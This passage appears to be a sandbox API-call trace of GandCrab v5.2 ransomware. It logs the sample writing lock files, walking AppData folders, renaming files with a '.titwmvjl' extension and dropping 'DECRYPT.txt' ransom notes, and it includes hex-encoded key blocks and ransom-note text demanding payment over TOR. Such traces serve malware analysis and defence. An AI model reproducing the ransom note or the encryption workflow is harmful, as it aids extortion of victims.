63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0096.116] WriteFile (in: hFile=0x2ac, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259f274, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259f274*=0x2162, lpOverlapped=0x0) returned 1 [0096.117] CloseHandle (hObject=0x2ac) returned 1 [0096.117] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.117] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.117] GetSystemTime (in: lpSystemTime=0x1e70400 | out: lpSystemTime=0x1e70400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x29, wMilliseconds=0x1aa)) [0096.117] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0096.118] GetWindowsDirectoryW (in: lpBuffer=0x2410000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0096.118] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2410200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2410600, lpMaximumComponentLength=0x2410608, lpFileSystemFlags=0x2410604, lpFileSystemNameBuffer=0x2410400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2410600*=0xd2ca4def, lpMaximumComponentLength=0x2410608*=0xff, lpFileSystemFlags=0x2410604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0096.118] wsprintfW (in: param_1=0x1e70000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\Default\\AppData\\Local\\d2ca4a09d2ca4deb61a.lock") returned 55 [0096.118] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\default\\appdata\\local\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2ac [0096.119] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.119] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.119] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Local\\") returned 31 [0096.119] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Local\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\AppData\\Local\\*") returned="C:\\Users\\Default\\AppData\\Local\\*" [0096.119] FindFirstFileExW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\*", fInfoLevelId=0x1, lpFindFileData=0x259f290, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259f290) returned 0x5037b8 [0096.119] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0096.119] FindNextFileW (in: hFindFile=0x5037b8, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 1 [0096.121] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0096.121] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0096.121] FindNextFileW (in: hFindFile=0x5037b8, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 1 [0096.121] lstrcmpW (lpString1="Application Data", lpString2=".") returned 1 [0096.121] lstrcmpW (lpString1="Application Data", lpString2="..") returned 1 [0096.121] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Local\\", lpString2="Application Data" | out: lpString1="C:\\Users\\Default\\AppData\\Local\\Application Data") returned="C:\\Users\\Default\\AppData\\Local\\Application Data" [0096.121] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Local\\Application Data", lpString2="\\" | out: lpString1="C:\\Users\\Default\\AppData\\Local\\Application Data\\") returned="C:\\Users\\Default\\AppData\\Local\\Application Data\\" [0096.121] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x1e70000 [0096.121] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.121] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0096.121] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.122] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0096.122] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.122] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0096.122] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.122] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0096.122] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.122] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.122] wsprintfW (in: param_1=0x1e70200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\Default\\AppData\\Local\\Application Data\\\\TITWMVJL-DECRYPT.txt") returned 69 [0096.122] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Application Data\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\default\\appdata\\local\\application data\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0096.123] GetLastError () returned 0x50 [0096.123] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.123] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.123] GetSystemTime (in: lpSystemTime=0x1e70400 | out: lpSystemTime=0x1e70400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x29, wMilliseconds=0x1b9)) [0096.123] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0096.123] GetWindowsDirectoryW (in: lpBuffer=0x2410000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0096.123] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2410200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2410600, lpMaximumComponentLength=0x2410608, lpFileSystemFlags=0x2410604, lpFileSystemNameBuffer=0x2410400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2410600*=0xd2ca4def, lpMaximumComponentLength=0x2410608*=0xff, lpFileSystemFlags=0x2410604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0096.124] wsprintfW (in: param_1=0x1e70000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\Default\\AppData\\Local\\Application Data\\d2ca4a09d2ca4deb61a.lock") returned 72 [0096.124] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Application Data\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\default\\appdata\\local\\application data\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0xffffffff [0096.124] GetLastError () returned 0x50 [0096.124] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.124] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.124] FindNextFileW (in: hFindFile=0x5037b8, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 1 [0096.124] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0096.124] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0096.124] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Local\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\Default\\AppData\\Local\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\Default\\AppData\\Local\\d2ca4a09d2ca4deb61a.lock" [0096.124] lstrlenW (lpString=".titwmvjl") returned 9 [0096.124] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Local\\d2ca4a09d2ca4deb61a.lock") returned 55 [0096.124] VirtualAlloc (lpAddress=0x0, dwSize=0xae, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.125] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\Default\\AppData\\Local\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 64 [0096.125] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Local\\d2ca4a09d2ca4deb61a.lock") returned 55 [0096.125] lstrlenW (lpString=".lock") returned 5 [0096.125] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0096.125] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".lock ") returned 6 [0096.125] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.125] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.125] FindNextFileW (in: hFindFile=0x5037b8, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 1 [0096.125] lstrcmpW (lpString1="History", lpString2=".") returned 1 [0096.125] lstrcmpW (lpString1="History", lpString2="..") returned 1 [0096.125] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Local\\", lpString2="History" | out: lpString1="C:\\Users\\Default\\AppData\\Local\\History") returned="C:\\Users\\Default\\AppData\\Local\\History" [0096.125] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Local\\History", lpString2="\\" | out: lpString1="C:\\Users\\Default\\AppData\\Local\\History\\") returned="C:\\Users\\Default\\AppData\\Local\\History\\" [0096.125] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x1e70000 [0096.126] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.126] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0096.126] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.126] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0096.126] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.126] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0096.126] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.126] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0096.126] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.127] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.127] wsprintfW (in: param_1=0x1e70200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\Default\\AppData\\Local\\History\\\\TITWMVJL-DECRYPT.txt") returned 60 [0096.127] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\History\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\default\\appdata\\local\\history\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b4 [0096.129] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\